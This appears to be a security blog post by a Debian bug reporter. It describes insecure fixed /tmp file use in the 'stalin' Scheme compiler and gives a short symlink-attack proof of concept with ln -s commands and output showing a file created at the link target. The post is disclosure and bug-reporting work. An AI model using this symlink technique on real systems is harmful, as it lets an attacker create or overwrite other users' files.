This week I'll be mostly doing drive-by bug-reporting.
As with last year we start by using the Debian Code Search, to look for obviously broken patterns such as "system.>./tmp/.*"
Once we find a fun match we examine the code and then report the bugs we find. Today that was stalin which runs some fantastic things on startup:
(system "uname -m >/tmp/QobiScheme.tmp")
(system "rm -f /tmp/QobiScheme.tmp"))
We can exploit this like so:
$ ln -s /home/steve/HACK /tmp/QobiScheme.tmp
$ ls -l /home/steve/HACK
ls: cannot access /home/steve/HACK: No such file or directory
Now we run the script:
$ cd /tmp/stalin-0.11/benchmarks
$ ./make-hello
And we see this:
$ ls -l /home/steve/HACK
-rw-r--r-- 1 steve steve 6 Dec 22 08:30 /home/steve/HACK
For future reference the lsat looks horrifically bad
- it writes multiple times to /tmp/lsat1.lsat and although it tries to detect races I'm not convinced. Something to look at in the future.
Tags: codesearch, debian, security No comments